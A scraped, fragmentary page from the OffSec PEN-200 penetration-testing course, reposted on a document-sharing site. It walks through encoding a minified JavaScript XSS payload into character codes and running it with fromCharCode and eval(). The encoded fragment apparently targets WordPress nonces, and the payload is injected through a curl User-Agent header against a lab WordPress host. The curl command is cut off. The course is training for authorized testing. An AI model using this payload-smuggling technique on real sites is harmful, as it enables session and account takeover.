Penetration Testing with Kali Linux OffSec

output += input.charCodeAt(pos)

səhifə	125/132
tarix	21.12.2023
ölçüsü
	#187693

1 ... 121 122 123 124 125 126 127 128 ... 132

PEN-200

,110,101,119,46,112,104,112,34,44,110,111,110,99,101,82,101,103,101,120,61,47,115,101, 114,34,32,118,97,108,117,101,61,34,40,91,94,34,93,42,63,41,34,47,103,59,97,106,97,120

output += input.charCodeAt(pos);
if(pos != (input.length - 1)) {
output += ",";
}
}
return output;
}
let encoded = encode_to_javascript('insert_minified_javascript')
console.log(encoded)
Listing 126 - JS Encoding JS Function
The
encode_to_javascript
function will parse the minified JS string parameter and convert each
character into the corresponding UTF-16 integer code using the
charCodeAt
380
method.
Let’s run the function from the browser’s console.
Figure 117: Encoding the Minified JS with the Browser Console
380
(Mozilla, 2022), https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/charCodeAt

Penetration Testing with Kali Linux
PWK - Copyright © 2023 OffSec Services Limited. All rights reserved.
244
We are going to decode and execute the encoded string by first decoding the string with the
fromCharCode
381
method, then running it via the
eval()
382
method. Once we have copied the
encoded string, we can insert it with the following curl command and launch the attack:
kali@kali:~$
curl -i http://offsecwp --user-agent
"
Yüklə

Dostları ilə paylaş:

1 ... 121 122 123 124 125 126 127 128 ... 132